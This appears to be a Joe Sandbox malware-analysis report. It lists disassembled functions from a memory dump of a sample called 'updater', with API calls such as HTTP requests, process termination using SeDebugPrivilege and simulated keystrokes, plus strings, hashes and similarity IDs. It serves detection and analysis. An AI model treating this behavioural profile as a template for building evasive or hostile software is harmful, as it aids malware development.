Opcode Fuzzy Hash: 6344ca0a7ae262a5bcf49b42fd5f4bdfbba878d28c6ce87a00f885a9e8136048
Instruction Fuzzy Hash: 73A15E747022228FCB2BEF14D995E69F364BF05741F1142ADE80AAB261CB31AD56CF91

Function 0036AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0036B13A), ref: 0036B078

Strings

REGEXPCLASS, xrefs: 0036AE3D
CLASSNN, xrefs: 0036AE1A
INSTANCE, xrefs: 0036AF86
CLASS, xrefs: 0036ADF7
NAME, xrefs: 0036AEAA
TEXT, xrefs: 0036AFAF

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 4ced1c474730d62816547e02dd831565d719a54249639fc513caad3a9f776fb8
Instruction ID: 94f1ebd4bf3c8a2858a6b1c575e7f87898c1ac2dd107ce8500440d49e57b50b4
Opcode Fuzzy Hash: 4ced1c474730d62816547e02dd831565d719a54249639fc513caad3a9f776fb8
Instruction Fuzzy Hash: 7E91C770500915EACB1AEF60C481BEEFBB4BF14304F10C119E85AEB155DF306999CFA1

Function 003131F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0031327E

Part of subcall function 0031218F: GetClientRect.USER32(?,?), ref: 003121B8
Part of subcall function 0031218F: GetWindowRect.USER32(?,?), ref: 003121F9
Part of subcall function 0031218F: ScreenToClient.USER32(?,?), ref: 00312221

GetDC.USER32 ref: 0034D073
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0034D086
SelectObject.GDI32(00000000,00000000), ref: 0034D094
SelectObject.GDI32(00000000,00000000), ref: 0034D0A9
ReleaseDC.USER32(?,00000000), ref: 0034D0B1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0034D13C

Strings

U, xrefs: 0034D011

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: d54352ba3d51518ccfcfa875eb71881e17debe613afda2af0b68c275f78d5a58
Instruction ID: e4ac4eae0ea9167eb6e3cfbaad7b2b6982cbb3f3a49dce5f3b23f01007667904
Opcode Fuzzy Hash: d54352ba3d51518ccfcfa875eb71881e17debe613afda2af0b68c275f78d5a58
Instruction Fuzzy Hash: 3871DD30500205EFCF279F64C884AEA7BF9FF49320F15466AED555F2A6C731A882DB60

Function 0039C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

Part of subcall function 00312714: GetCursorPos.USER32(?), ref: 00312727
Part of subcall function 00312714: ScreenToClient.USER32(003D77B0,?), ref: 00312744
Part of subcall function 00312714: GetAsyncKeyState.USER32(00000001), ref: 00312769
Part of subcall function 00312714: GetAsyncKeyState.USER32(00000002), ref: 00312777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0039C69C
ImageList_EndDrag.COMCTL32 ref: 0039C6A2
ReleaseCapture.USER32 ref: 0039C6A8
SetWindowTextW.USER32(?,00000000), ref: 0039C752
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0039C765
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0039C847

Strings

@GUI_DROPID, xrefs: 0039C799
@GUI_DRAGFILE, xrefs: 0039C7DC

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: afd7ec0644acc611924b9cc91676ebcaf0c5ab7e84d6da1f964132223f407f97
Instruction ID: 22026ed4222895d0053a8c631205168b0626c59715e4e831b60a61c61fa68407
Opcode Fuzzy Hash: afd7ec0644acc611924b9cc91676ebcaf0c5ab7e84d6da1f964132223f407f97
Instruction Fuzzy Hash: 8551CE71508304AFDB06EF14DC5AFAA7BE5EB88310F00491DF9958B2E1DB30A958CB52

Function 003820E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0038211C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00382148
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0038218A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0038219F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003821AC
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003821DC
InternetCloseHandle.WININET(00000000), ref: 00382223

Part of subcall function 00382B4F: GetLastError.KERNEL32(?,?,00381EE3,00000000,00000000,00000001), ref: 00382B64
Part of subcall function 00382B4F: SetEvent.KERNEL32(?,?,00381EE3,00000000,00000000,00000001), ref: 00382B79

Strings

, xrefs: 003821CD

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 34185ea5114c686591f78e54a9c10e5acfb87bc1c6d4c48a1436d1587cf272c2
Instruction ID: c98ebde9b17d6d203722e2eefe76a89a2aa808c67dbd00bbc59c51cc01c7424e
Opcode Fuzzy Hash: 34185ea5114c686591f78e54a9c10e5acfb87bc1c6d4c48a1436d1587cf272c2
Instruction Fuzzy Hash: A3416DB1501318BFEB57AF60CC89FBB7BACEF09354F104156FA059A191D771AE448BA0

Function 00389330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,003A0980), ref: 00389412
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003A0980), ref: 00389446
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003895C0
SysFreeString.OLEAUT32(?), ref: 003895EA

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: ba583d045e5128db1709ab32be8650a3e6578c90cb4d641a96101be1bb68a1d7
Instruction ID: cf1458e4216bd2141a400f9afdcca15d2eb6925838d140bfff5bd1c0fd2df04f
Opcode Fuzzy Hash: ba583d045e5128db1709ab32be8650a3e6578c90cb4d641a96101be1bb68a1d7
Instruction Fuzzy Hash: 0CF12B71A00209EFCB16EF94C884EBEB7B9FF49314F158099F516AB251DB31AE46CB50

Function 0037527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00374BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00373B8A,?), ref: 00374BE0

Part of subcall function 00374BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00373B8A,?), ref: 00374BF9

Part of subcall function 00374FEC: GetFileAttributesW.KERNEL32(?,00373BFE), ref: 00374FED

lstrcmpiW.KERNEL32(?,?), ref: 003752FB
_wcscmp.LIBCMT ref: 00375315
MoveFileW.KERNEL32(?,?), ref: 00375330

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 9b0e160a26490023d7b6f275503c0da2be5e03129c2a8cdd4f2f9a39ea4f756c
Instruction ID: 5654fdfa42898ad7e439165dc034692a6d9111da0f8921ea7bb50268ae416706
Opcode Fuzzy Hash: 9b0e160a26490023d7b6f275503c0da2be5e03129c2a8cdd4f2f9a39ea4f756c
Instruction Fuzzy Hash: BE5184B20087949BC776EBA4D8819DFB3ECAF84300F50491EF689D7152EF74A688C756

Function 00398C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00398D24

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: edc1fc433324ce0354c3d3fad8a27695d83356bf16acce15ab0762ab17cc9b71
Instruction ID: d84bf795c5e6316f0ffb4a34d7bb09c2d1ff3c075f2b5d85f4702949c317ed33
Opcode Fuzzy Hash: edc1fc433324ce0354c3d3fad8a27695d83356bf16acce15ab0762ab17cc9b71
Instruction Fuzzy Hash: 1251B130A41204BFEF27AF28CC89B997B68FB87310F254516F915EB5E1CF71A990DA50

Function 00312F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0034C638
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0034C65A
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0034C672
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0034C690
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0034C6B1
DestroyIcon.USER32(00000000), ref: 0034C6C0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0034C6DD
DestroyIcon.USER32(?), ref: 0034C6EC

Part of subcall function 0039AAD4: DeleteObject.GDI32(00000000), ref: 0039AB0D

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 534fe60d0186ff5a8b04846a63ee278d89c87706b43bbd3e8d0f15386ae16162
Instruction ID: 018a789e4ffbb3513ca9857413f0add8e9308046dc90d254c9feee27398aaba2
Opcode Fuzzy Hash: 534fe60d0186ff5a8b04846a63ee278d89c87706b43bbd3e8d0f15386ae16162
Instruction Fuzzy Hash: 33519B70610209AFDB2ADF24DC45FAA77F9FB48710F114519F9429B2A0DB71ECA1DB50

Function 0036A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0036B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0036B54D
Part of subcall function 0036B52D: GetCurrentThreadId.KERNEL32 ref: 0036B554
Part of subcall function 0036B52D: AttachThreadInput.USER32(00000000,?,0036A23B,?,00000001), ref: 0036B55B

MapVirtualKeyW.USER32(00000025,00000000), ref: 0036A246
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0036A263
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0036A266
MapVirtualKeyW.USER32(00000025,00000000), ref: 0036A26F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0036A28D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0036A290
MapVirtualKeyW.USER32(00000025,00000000), ref: 0036A299
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0036A2B0
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0036A2B3

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 4c206a677ebd34176d9a12b934b882419ab48cae289881c4e4170a725cb51e63
Instruction ID: 81f54ea91c6d86de019d9007aa3dbe11b9cbae949b9b74c32643fafcab899c8d
Opcode Fuzzy Hash: 4c206a677ebd34176d9a12b934b882419ab48cae289881c4e4170a725cb51e63
Instruction Fuzzy Hash: 3F1104B1950618BEF6116F609C8AFAA7F2DEF4E795F104419F340AB0E0CAF35C509EA4

Function 003694D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0036915A,00000B00,?,?), ref: 003694E2
HeapAlloc.KERNEL32(00000000,?,0036915A,00000B00,?,?), ref: 003694E9
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0036915A,00000B00,?,?), ref: 003694FE
GetCurrentProcess.KERNEL32(?,00000000,?,0036915A,00000B00,?,?), ref: 00369506
DuplicateHandle.KERNEL32(00000000,?,0036915A,00000B00,?,?), ref: 00369509
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0036915A,00000B00,?,?), ref: 00369519
GetCurrentProcess.KERNEL32(0036915A,00000000,?,0036915A,00000B00,?,?), ref: 00369521
DuplicateHandle.KERNEL32(00000000,?,0036915A,00000B00,?,?), ref: 00369524
CreateThread.KERNEL32(00000000,00000000,0036954A,00000000,00000000,00000000), ref: 0036953E

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: bb936b0694da9b91266bace606d6f81b3bb421fa02d814c794b0f1c0025d2d78
Instruction ID: ca895a97fafcbd750e893667d47cc05d155310feedd8c1ce7152afa312b938c2
Opcode Fuzzy Hash: bb936b0694da9b91266bace606d6f81b3bb421fa02d814c794b0f1c0025d2d78
Instruction Fuzzy Hash: 1301CDB5240304BFE711AFA5DC4DFAB7BACEB8A711F008411FA05DB1A1DA749800CB30

Function 0038A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 0038A265
NULL Pointer assignment, xrefs: 0038A28E, 0038A5B2

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: acb7f912dd950c03e63ed24303514d88992f60e0ab0ac7f471c2a926941df777
Instruction ID: c168d24d454bc5aa0b8d99405766d61754367a3f7b0927c0ebdd408e3d0e9b72
Opcode Fuzzy Hash: acb7f912dd950c03e63ed24303514d88992f60e0ab0ac7f471c2a926941df777
Instruction Fuzzy Hash: D3C1C571A007199FEF15EF98C884BAEB7F9FB48310F1584AAE945AB240E7B0DD44CB51

Function 003897FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00389851
VariantInit.OLEAUT32(?), ref: 00389922
VariantInit.OLEAUT32(?), ref: 00389A23
VariantClear.OLEAUT32(?), ref: 00389A2D
VariantClear.OLEAUT32(?), ref: 00389A8A

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00389A06
Null Object assignment in FOR..IN loop, xrefs: 003898B2, 003899E0, 00389A98

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 7b965a4ca7e1ada550bee96d760120354dbb4e8c25b81de7fe4362e5b4539fd2
Instruction ID: 35513a5813e1785eb0aae93490c67b752a22c413c920545e17497f9155ec34c3
Opcode Fuzzy Hash: 7b965a4ca7e1ada550bee96d760120354dbb4e8c25b81de7fe4362e5b4539fd2
Instruction Fuzzy Hash: 79919E70A00319ABDF26DFA5C884FAEBBB8EF45710F14859EF516AB240D7749944CFA0

Function 016DAB3D Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,016DAE08,?,?,00000000,00000000), ref: 016DAB73

Part of subcall function 016D9341: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 016D935F

Strings

AMPM, xrefs: 016DAD87
:mm, xrefs: 016DADA6
mmmm d, yyyy, xrefs: 016DAC6F
m/d/yy, xrefs: 016DAC42
:mm:ss, xrefs: 016DADC3
AMPM , xrefs: 016DAD96

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: bf7e525f8cb597fadc96a3981877e628f477d67b40e9bf1c820118de01dfbdae
Instruction ID: b99ca73c82bdea9b47c2035f029c80aa9b089d743f4f9fd96ffbab9dd74b1be6
Opcode Fuzzy Hash: bf7e525f8cb597fadc96a3981877e628f477d67b40e9bf1c820118de01dfbdae
Instruction Fuzzy Hash: B561BF31F0420A9BDB00EFE9DC90A9F77A7EBA8300F51A53DA501DB389DE36C9059B14

Function 003973A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00397449
SendMessageW.USER32(?,00001036,00000000,?), ref: 0039745D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00397477
_wcscat.LIBCMT ref: 003974D2
SendMessageW.USER32(?,00001057,00000000,?), ref: 003974E9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00397517

Strings

SysListView32, xrefs: 0039741B

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 750813d40014b1e7ecf150e892e347ca92e1e8924103acb7f3b5a4915f2d67a8
Instruction ID: 2f979c39aab269edc0e722c2cd3fcf4d8e1ea6d269e0b5f8ab0b2b1c13b8bb2c
Opcode Fuzzy Hash: 750813d40014b1e7ecf150e892e347ca92e1e8924103acb7f3b5a4915f2d67a8
Instruction Fuzzy Hash: 46419371A14348AFEF229F64CC85BEE77A8EF08350F11442AF985A72D2D7719D84CB50

Function 016DD041 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 016DD0DA
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 016DD0F6
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 016DD12F
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 016DD1BB
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 016DD1DA
VariantCopy.OLEAUT32(?), ref: 016DD20F

Strings

, xrefs: 016DD05B

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-3916222277
Opcode ID: d86e1f33596d4aef53c3cfaa159972970693b9ff1c5b14be54ccb225d1272e81
Instruction ID: 687f2cba470f39b774ec1cc5835c0f4634bce803bcd76edf580bd2f501705b62
Opcode Fuzzy Hash: d86e1f33596d4aef53c3cfaa159972970693b9ff1c5b14be54ccb225d1272e81
Instruction Fuzzy Hash: 2E51D875D0461E9BCB62EBA9CC90BD9B3BDAF5D200F0041D9A608E7245DB30AF85CF65

Function 0038F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00374148: CreateToolhelp32Snapshot.KERNEL32 ref: 0037416D
Part of subcall function 00374148: Process32FirstW.KERNEL32(00000000,?), ref: 0037417B
Part of subcall function 00374148: CloseHandle.KERNEL32(00000000), ref: 00374245

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038F08D
GetLastError.KERNEL32 ref: 0038F0A0
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038F0CF
TerminateProcess.KERNEL32(00000000,00000000), ref: 0038F14C
GetLastError.KERNEL32(00000000), ref: 0038F157
CloseHandle.KERNEL32(00000000), ref: 0038F18C

Strings

SeDebugPrivilege, xrefs: 0038F0AB

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

